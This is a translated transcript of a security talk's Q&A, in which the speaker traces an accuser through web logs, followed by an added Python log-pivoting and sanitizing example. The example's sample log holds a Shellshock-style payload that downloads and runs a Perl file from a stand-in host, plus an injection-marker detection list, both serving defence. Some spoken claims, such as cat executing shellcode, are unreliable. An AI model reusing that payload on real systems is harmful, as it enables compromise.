From the conversation with the lawyer I had that day, I got 100% certainty that I could convict such a person, as a member of the Association of Persons with Legal Assets, for defamation or another kind of offence against dignity and good name, because we as the Security Association were accused of the fact that the data was pulled out, leaked, which is in some way under our authority, so that's what I could theoretically state if it were true. Because it is not true, and I decided to dig up this person (I mean dig up; a lot is said about it), I wanted to describe it step by step, to use it as material. I suspect that if I had wanted to report it, I would have been banned for the next six months or a year. In fact, the police might have established it, maybe not. I'm not sure how it would have gone. Sometimes amateurs see more; I don't know exactly how my cooperation with the police would have gone, sending logs. I'm afraid that in such a silly case we would have made a mockery of ourselves by announcing it, rather than reacting in this way. Because in my opinion I responded to his laughter with my own laughter. Speaking about it now, I have kept face in some way. I think that judging by the dialect this person uses, it would be useless, because she is too young to be a criminal. No, this person, I think, is a full-time person, a resident of a different city than Warsaw, and a person who, in my opinion (and I don't want to say it's confirmed and so on), stands behind such a nickname as Drma Zdzisław, or an mBank consultant. Because it's one person, one joke, that's what I'm after. All these traces I showed, I think they were protected in other places, in other situations. And it's too bad to stick it, but yes, I suspect it's one person. Yes, it wouldn't do anything, because what would I fight off him here? If he
went for 6 months, then he would have another problem: he would pay me 200-500 PLN per day. It's not about that. For me the PR approach was more important. At that moment it was about how I would face him or her. Would he do the same as he planned? Would I give up? He won't respond anymore. Any more questions? You can ask about anything, but I won't answer.

If there are no questions... and if there are, then seriously, there is a question. I think that the solution can be some kind of compartmentalization, yes. Divide these services, close them in containers, the things that are on the server, to limit them. It was implemented thanks to Patryk Radosz, who once pointed me to containers via a random Facebook friend. That's why, yes, I really think that it wasn't about containers, it wasn't about all of that. Even if I cut out the public key, the containers would also fall, right? Because unfortunately I am a person who likes his key very much. I am attached to it, I have been using it for several years, so if someone wins it, I congratulate him, because it probably wouldn't be possible, but okay. Unless he bought a disk from me on Allegro. But that was a long time ago and there was no key on it. Okay, never mind. No, no, the point is that, you know what, no, no, no. I think there are moments when we actually use containers and keep things in containers. We have a super uber security level. We call it a security zone. On the other hand, this WordPress, on which this page stands, and this server, date from when it all started and we were just putting together some solutions, because we were building this infrastructure and it was hard to assemble. So here it was a big problem to implement it all at once. Unfortunately. In 2015 one of the speakers talked about "sauce on confidence" and said: "Let's not rush with all the security at once, let's do it gradually. Because when we rush at once, we'll screw everything up. And when we do it gradually, we'll screw only one thing up." So I preferred to screw up one thing, that is nginx, than actually rush into containers etc. for further security issues. And you wake up to the fact that someone from a container, for example LXC on Debian, went to another container, made a mistake, and suddenly it turns out that the whole server is compromised, and not just a piece of WordPress. Because there is always a risk that someone will drop a web shell on WordPress, get to the www-data user, change the page and go. And thank God, the database doesn't move, the git doesn't move, the users don't move.

Next question? It's about the PR approach, because different companies deal with it differently. Maybe it would be good to make a presentation or a tutorial, a best practice on how to handle it. How to behave when they kick me?

I'm sure I won't put the other one on the shelf like Jesus, but I'll think about it. I think it can actually appear. I'm a five-pointed guy and it's a mess of cards. I want to extend it a bit, because I have one more thing to say. Okay. So, we read the logs, and please tell me... How many admins are there in the room? Hands up, admins, please admit it. Yes, devops and possibly security people. Ok, now tell me, my dear friends (nobody is answering because they know), what error was made in reading the logs? Was it made? Well,
relatively purposefully; it quickly appeared in the article, noticed by people, and we'll see if you notice it. No, the fact that it's from root, yes, that's related later, but it's still not it. Yes, I mean, I read files with cat. Why? That's not the right answer. Exactly. cat is a hole and allows shellcode to be executed. So the shell injection that was mentioned before. Seriously, if I read the logs, these logs read today, which are cut by my firewall of course: on my firewall there are about 10-15 shell injection attempts per day in the user agent. They consist of wget, TCMP or another command that pulls a file, runs a Perl file with an IRC bot for a botnet, and connects the computer to the botnet. Every time someone writes a function with cat, or reads logs in PHP through cat, or reads logs through the console or any other application using cat, it hurts, because it runs another bot. I know a person who has an app that runs it three times a day. Exactly, it's remote access, to avoid forgetting the password. There is also another thing, to prove it to you: on Sekurak there is a PoC, and I recommend generating some program which will write those notes with echo -e to a file and then cat it. In 80% of cases, if the file is well written, you will get text colouring in cat without any additional flags. So don't do that either. And the fact that it's root: if this error is made and this shellcode appears, it gives the user root. So this is the second mistake, but less important when I do it with grep. Of course, I should have done that, it would be shorter, but above all when it comes to security. It even has its own CVE. Before Piątkosia kicks me out, because he's already kicking me out, not kicking me out, but I've been talking all day. Any additional questions?

Grep. Just grep. You put a file into grep and you taught it yourself. Right. Nikof taught me how to read logs. Long time ago, when I started. Any more questions? I won't say I'm recruiting, because I'm not. But if someone wants to recruit me, I'm open. Okay, I thought so. Every year I say the same thing; nobody wants to recruit me. Okay, so here it is: SCP, Social and Contact Page. I like to think up my own abbreviations, as the company name itself indicates. If someone is looking for something, the email is here, there is Facebook, there is Twitter. On Facebook I have a funny (maybe not for everyone) fanpage, "Bowch Pechat". Sometimes there's a thought, sometimes a funny picture with Cardinal Dziewisz stopping demons, if anyone knows what I'm talking about. And sometimes just a sticker, a piece of text that you can pass on to someone. And on the business profile, i.e. this SMS Poland, it won't pass due to reputation issues. I think that's all. If there are no questions, thank you very much.
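
The following is an added example, not part of the talk or the speaker's own material, illustrating two things the talk covers: the log-reading pivot from "reading logs, part 1 and part 2" (which address fetched the exposed key file, what User-Agent that address presented, and where else that same User-Agent shows up, including earlier dates and other addresses), and the point raised in the Q&A about reading logs safely (shell-injection payloads and terminal escape sequences arriving in the User-Agent field). It is written in Python rather than the grep the speaker recommends so that the steps are explicit. The log lines, the RFC 5737 IP addresses and the phone User-Agent string are constructed for this illustration and are not the speaker's real logs.

```python
"""Log pivoting over web-server access logs, plus hygiene for lines you are about to display.

Added example. The log lines, IP addresses (RFC 5737 ranges) and the phone User-Agent
are constructed for this illustration; they are not the speaker's real logs.
"""
import re
from datetime import datetime

# Constructed stand-in for the mobile User-Agent that served as the common denominator.
PHONE_UA = ("Mozilla/5.0 (Linux; Android 4.2.2; ExamplePhone Build/ABC123) "
            "AppleWebKit/537.36 Mobile Safari/537.36")

# Constructed sample in Apache/nginx "combined" format.
SAMPLE_LOG_LINES = [
    '203.0.113.9 - - [23/Jun/2016:15:16:02 +0200] "GET /blog/ HTTP/1.1" 200 5120 "-" "' + PHONE_UA + '"',
    '198.51.100.7 - - [26/Jun/2016:04:43:11 +0200] "GET / HTTP/1.1" 200 1024 "-" "' + PHONE_UA + '"',
    '198.51.100.7 - - [26/Jun/2016:04:52:40 +0200] "GET /public_rsa HTTP/1.1" 200 394 "-" "' + PHONE_UA + '"',
    '198.51.100.7 - - [26/Jun/2016:04:52:41 +0200] "GET /favicon.ico HTTP/1.1" 404 209 "-" "' + PHONE_UA + '"',
    '192.0.2.33 - - [26/Jun/2016:13:31:05 +0200] "GET /blog/ HTTP/1.1" 200 5120 "-" "' + PHONE_UA + '"',
    '192.0.2.44 - - [26/Jun/2016:09:10:00 +0200] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (compatible; Applebot/0.1)"',
    # Shell-injection attempt in the User-Agent, of the kind the speaker describes seeing daily.
    '192.0.2.55 - - [26/Jun/2016:11:00:00 +0200] "GET / HTTP/1.1" 200 1024 "-" '
    '"() { :;}; /bin/bash -c \\"wget http://192.0.2.66/x.pl -O /tmp/x.pl; perl /tmp/x.pl\\""',
    # Terminal escape sequences in the User-Agent: inert in the file, not when cat'ed to a tty.
    '192.0.2.77 - - [26/Jun/2016:12:00:00 +0200] "GET / HTTP/1.1" 200 1024 "-" "\x1b[2J\x1b[31mOwned\x1b[0m"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def parse_log(lines):
    return [rec for rec in map(parse_line, lines) if rec is not None]

def ips_requesting(records, path):
    """Step 1: which addresses fetched the sensitive path (here the exposed key file)."""
    return sorted({r["ip"] for r in records if r["path"] == path})

def user_agents_of(records, ip):
    """Step 2: which User-Agent strings that address presented."""
    return sorted({r["ua"] for r in records if r["ip"] == ip})

def hits_with_user_agent(records, ua):
    """Step 3: every request carrying that exact User-Agent, from any address, oldest first."""
    return sorted((r["ts"], r["ip"], r["path"]) for r in records if r["ua"] == ua)

def pivot(records, path):
    """Chain the three steps: path -> IPs -> User-Agents -> related hits and other IPs."""
    ips = ips_requesting(records, path)
    uas = sorted({ua for ip in ips for ua in user_agents_of(records, ip)})
    hits = sorted(h for ua in uas for h in hits_with_user_agent(records, ua))
    return {
        "ips": ips,
        "user_agents": uas,
        "other_ips": sorted({ip for _, ip, _ in hits} - set(ips)),
        "first_seen": hits[0][0] if hits else None,
        "hits": hits,
    }

# Substrings that do not occur in legitimate browser User-Agents but do in injection payloads.
INJECTION_MARKERS = ("() {", "/bin/sh", "/bin/bash", "wget ", "curl ", "perl ", "chmod ", "$(", "`", "/tmp/")

def has_control_chars(s):
    """True if the string contains C0/C1 control characters (ESC, BEL, CR, ...)."""
    return any(ord(c) < 0x20 or 0x7F <= ord(c) < 0xA0 for c in s)

def is_suspicious_ua(ua):
    low = ua.lower()
    return has_control_chars(ua) or any(marker in low for marker in INJECTION_MARKERS)

def sanitize_for_terminal(s):
    """Escape control characters as \\xNN so that echoing a log line cannot drive the terminal."""
    return "".join(
        c if not (ord(c) < 0x20 or 0x7F <= ord(c) < 0xA0) else f"\\x{ord(c):02x}"
        for c in s
    )

def suspicious_requests(records):
    """(ip, sanitized User-Agent) for every request whose User-Agent looks like an attack."""
    return [(r["ip"], sanitize_for_terminal(r["ua"])) for r in records if is_suspicious_ua(r["ua"])]

RECORDS = parse_log(SAMPLE_LOG_LINES)

if __name__ == "__main__":
    result = pivot(RECORDS, "/public_rsa")
    print("fetched the key file:", result["ips"])
    print("same User-Agent also seen from:", result["other_ips"])
    print("earliest related hit:", result["first_seen"])
    for ip, ua in suspicious_requests(RECORDS):
        print("suspicious User-Agent from", ip, "->", ua)
```

Run stand-alone, the pivot starts from the single request for /public_rsa, recovers the phone User-Agent behind it, and then surfaces the 23 June hit from a different address that a search restricted to the day of the incident would have missed. The sanitizer is what stands between the log file and your terminal: anything you are going to print from an attacker-controlled field should go through it (or through grep/less with control characters escaped) rather than through a bare cat.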